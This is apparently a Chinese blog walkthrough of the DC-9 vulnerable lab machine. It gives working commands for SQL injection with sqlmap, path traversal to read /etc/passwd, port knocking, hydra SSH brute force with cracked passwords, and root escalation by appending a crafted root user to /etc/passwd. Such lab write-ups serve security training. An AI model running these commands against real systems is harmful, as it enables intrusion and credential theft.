靶机

攻击机

nmap扫描一下IP

访问ip

既然这种的可以查询，那么很显然我们可以想到这里会不会有sql注入？试一下

得到密码transorbital1，用户名为admin，我们去他网页的登录窗口登录一下看能不能登录上

确定了之后我们尝试一下爆破22端口

这次我们发现了一个新的用户和密码

注：一下内容仅供交流学习，请勿用于非法用途

靶机

DC-9

链接: https://pan.baidu.com/s/1jzlGQBZQ4YRhh01U9_IopQ?pwd=9ah5 提取码: 9ah5

攻击机

kali

nmap扫描一下IP

发现22端口状态是过滤的

访问ip

可以右键查看一下源码看看有没有什么东西

发现没有什么特别的东西

分别点开这几个选项看看

Display All Records

Manage

扫目录看一下，或者作指纹识别来看版本

nikto -host xxxIP(作用和dirb差不多)

版本

有发现这么一个神奇的东西

去看看，结果发现一片空白

还发现了includes(可以想到会不会有文件包含漏洞)

进去看看，发现也是空的

既然没发现什么，那我们从网页入手

我们去查询一下看看能不能查询，结果发现可以

既然这种的可以查询，那么很显然我们可以想到这里会不会有sql注入？试一下

可以手工注入一下看看

没有报错

那这里肯定有，我们可以利用工具试试

sqlmap

sqlmap -u http://192.168.60.22/results.php --data="search=1"

发现是有的

获取一下库名

sqlmap -u http://192.168.60.22/results.php --data="search=1" --dbs

我们这里先查询查询users的表名和列名，毕竟这个名字诱惑性比较大

sqlmap -u http://192.168.60.22/results.php --data="search=1" -D users --tables

sqlmap -u http://192.168.60.22/results.php --data="search=1" -D users -T UserDetails --dump

做成一个字典爆破一下看看，按住Alt键加鼠标可以复制单列

现在开始爆破，这里我们用wfuzz

wfuzz -z file,username -z file,password -d "username-FUZZ&password=FUZ2Z" http://192.168.60.22/manage.php

一堆

过滤一下看看

wfuzz -z file,username -z file,password --hw 93 -d "username-FUZZ&password=FUZ2Z" http://192.168.60.22/manage.php

结果发现还是什么都没有

看来这里的密码不是80端口的，可以等下尝试一下22端口的，不过我们不是还有一个库没有查询嘛，去那个库里面看看有啥

sqlmap -u http://192.168.60.22/results.php --data="search=1" -D Staff --tables

分别看一下这两个表的内容

sqlmap -u http://192.168.60.22/results.php --data="search=1" -D Staff -T StaffDetails --dump

sqlmap -u http://192.168.60.22/results.php --data="search=1" -D Staff -T Users --dump

这里sqlmap提示我们可以帮我们解密一下，那必然同意，按y，后面的根据提示操作即可，但这里我们没有搞到明文的密码，可能是字典不够强大，但也没办法，我们自己去解一下

856f5de590ef37314e7c3bdf6f8a66dc

还是去somd5.com

得到密码transorbital1，用户名为admin，我们去他网页的登录窗口登录一下看能不能登录上

登录成功，但这里提示文件不存在，我们可以猜测这里会不会是它在寻找一个文件，但是没有找到

话不多说，用fuzz帮它找一下，不过提示一下，由于我们是登录后才知道需要寻找文件，所以我们这里需要提供cookie才能进行查找

Cookies是一种技术，它能够把你在访问网站时的产生的一些行为信息给读取保存下来。

最常见的便是我们在访问某些网页的的时候提示我们是否要保存用户名和密码，我们点击确定后，再次来到网站的时候，网站就能够读取到cookies，知道我们的用户信息，做出相应的处理机制，我们则不用再输入用户名和密码。

Cookies的用途

服务器可以利用Cookies包含信息的任意性来筛选并经常性维护这些信息，以判断在HTTP传输中的状态。Cookies最典型的应用是判定注册用户是否已经登录网站，用户可能会得到提示，是否在下一次进入此网站时保留用户信息以便简化登录手续，这些都是Cookies的功用。另一个重要应用场合是“购物车”之类处理。用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品，这些信息都会写入Cookies，以便在最后付款时提取信息

这里可以按F12进行查看，或者抓包查看

PHPSESSID=c7kf0bsq6d44o7dpo8qjier353

wfuzz -b 'PHPSESSID=c7kf0bsq6d44o7dpo8qjier353' -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.60.22/manage.php?FUZZ=index.php

过滤一下

wfuzz --hw 100 -b 'PHPSESSID=c7kf0bsq6d44o7dpo8qjier353' -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.60.22/manage.php?FUZZ=index.php

还是没有

这里有三种可能

我们猜测错了，这里没有文件包含漏洞
字典太弱
可能正确与不正确返回的刚好是一样的

我们不能死心，看改一下文件名看看，linux系统一定存在的目录是哪个，是根目录，而根目录下有/etc/passwd，而返回上一级的命令为../，所以为了保险我们这里多返回几级

wfuzz --hw 100 -b 'PHPSESSID=c7kf0bsq6d44o7dpo8qjier353' -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.60.22/manage.php?FUZZ=../../../../../../etc/passwd

这次成功地找出来了

去访问一下

192.168.60.22/manage.php?file=../../../../../../etc/passwd

果然有存在文件包含漏洞

确定了之后我们尝试一下爆破22端口

使用hydra（九头蛇）

hydra -L username -P password 192.168.60.22 ssh

结果显示无法连接22端口，这里我们倒也不例外，因为我们一开始扫端口的时候就有提示

所以这里涉及了一个知识点knockd服务端口敲门，该服务通过动态的添加iptables规则来隐藏系统开启的服务，使用自定义的一系列序列号来“敲门”，使系统开启需要访问的端口才能对外访问，不使用时则使用自定义的序列号来“关门”，不对外监听，进一步提高了系统的安全性。其实就像我们回宿舍的时候对的暗号差不多。它存放的路劲是一定的，在/etc/knockd.conf

这里提示了先敲7469，再敲8475，再敲9842

敲门的方法有很多，我们直接用最简单的nmap

nmap -p 7469 192,168,60,22

nmap -p 8475 192,168,60,22

nmap -p 9842 192,168,60,22

也可以使用

for -x in 7469 8475 9842 ;do nc 192.168.60.22 $x;done

再爆破一次

hydra -L username -P password 192.168.60.22 ssh

这次得到三个账号和密码

chandlerb            UrAG0D!
joeyt               Passw0rd
janitor             Ilovepeepee

ls -a查看一下隐藏文件

BamBam01

Passw0rd

smellycats

P0Lic#10-4

B4-Tru3-001

4uGU5T-NiGHts

后面两个用户也看一下

查看一下history发现啥也没有

接着sudo -l看一下，发现没有高权限

没办法，我们试着将刚刚得到的密码加入到我们之前创建的密码本里，再进行一次爆破

这次我们发现了一个新的用户和密码

用户为fredf 密码为B4-Tru3-001

发现一个不需要密码就可以执行的程序，进去发现提示

找一下这个文件

find / -name "test.py"

find / -name "test.py" 2>/dev/null （2表示一个标准的错误文件描述符，报错的屏蔽掉）

（root）为读取一个文件的内容，追加到另一个文件

思路：

反弹shell crontab（定时文件）

/etc/passwd修改密码再建一个root用户等等

这里我们用第二个思路

openssl passwd -1(md5) -salt（插入一个随机数作为文件进行加密） admin 123456 （加盐）

openssl passwd -1 -salt admin 123456

将这个加到fredf的临时文件内

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:bin/bash' >> /tmp/passwd

追加文件

sudo ./test /tmp/passwd /etc/passwd

使用/test这个程序将/tmp/passwd追加到/etc/passwd

su root

输入密码123456成功进入root获得权限

kali渗透之取得DC-9的root权限相关推荐

kali mysql停止服务器_从零开始：手把手教你黑客入门攻破服务器并获取ROOT权限...
有许多人对神秘的黑客一直感兴趣,却苦于网上资料繁杂,无法入门,在学黑客之前,你要知道什么是黑客,黑客就是那些对计算机有着强烈探索欲的人,一个真正的黑客,必须要至少掌握一门编程技术和熟悉系统的操作命令. ...
Kali渗透测试之端口扫描1——UDP、TCP、僵尸扫描、隐蔽扫描
端口扫描每个服务器上面都会跑很多应用,每个应用都会侦听某些端口,通过侦听端口接收来自客户端或其他用户对应用程序的访问.所以在发现目标主机存活后,我们需要知道目标主机上都开放了那些端口,应用程序的漏洞 ...
Kali渗透测试-远程控制：6200端口变成“后门”
Kali渗透测试-远程控制:6200端口变成"后门" 测试环境攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:M ...
小白Kali渗透Windows XP专业版SP3
对于一个学网络安全的人,不会Kali Linux,说出去会被同行笑掉大牙,而会Kali Linux,却又不会渗透一个13年前的老系统:Windows XP,那就不是笑掉大牙了,而是满口牙都会被笑掉:毕 ...
小白日记18：kali渗透测试之缓冲区溢出实例（二)--Linux，穿越火线1.9.0
Linux系统下穿越火线-缓冲区溢出原理:crossfire 1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞. 工具: 调试工具:edb: ###python在漏洞溢出方面的渗透测 ...
Kali渗透测试之六提升权限
◆提升权限:获取目标系统的控制权是渗透成功的标志.审计人员也可以使用适用于目标系统的本地漏洞来提升自己的权限,只要他们能够在目标系统上运行提权漏洞利用程序,就可以获得主机上的超级用户权限或者系统级权限 ...
Kali渗透测试：网络数据的嗅探与欺骗
Kali渗透测试:网络数据的嗅探与欺骗无论什么样的漏洞渗透模块,在网络中都是以数据包的形式传输的,因此如果我们能够对网络中的数据包进行分析,就可以掌握渗透的原理. 另外,很多网络攻击的方法也都是发送 ...
Kali渗透测试：身份认证攻击
Kali渗透测试:身份认证攻击 1.1 简单网络服务认证的攻击网络上很多常见的应用都采用了密码认证的方式,如SSH.Telnet.FTP等.这些应用被广泛应用在各种网络设备上,如果这些认证模式出现问 ...
kali渗透测试环境搭建
推荐阅读 kali渗透测试环境搭建 https://m.weishi100.com/mweb/series/?id=1373351 https://m.weishi100.com/mweb/seri ...
Kali渗透测试：远程控制被控端免杀及DLL生成、注入反弹
Kali渗透测试:远程控制被控端免杀及DLL生成.注入反弹长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也在一直致力于研究避开检测的 ...

kali渗透之取得DC-9的root权限

靶机

攻击机

nmap扫描一下IP

访问ip

既然这种的可以查询，那么很显然我们可以想到这里会不会有sql注入？试一下

得到密码transorbital1，用户名为admin，我们去他网页的登录窗口登录一下看能不能登录上

确定了之后我们尝试一下爆破22端口

这次我们发现了一个新的用户和密码

kali渗透之取得DC-9的root权限相关推荐

最新文章

热门文章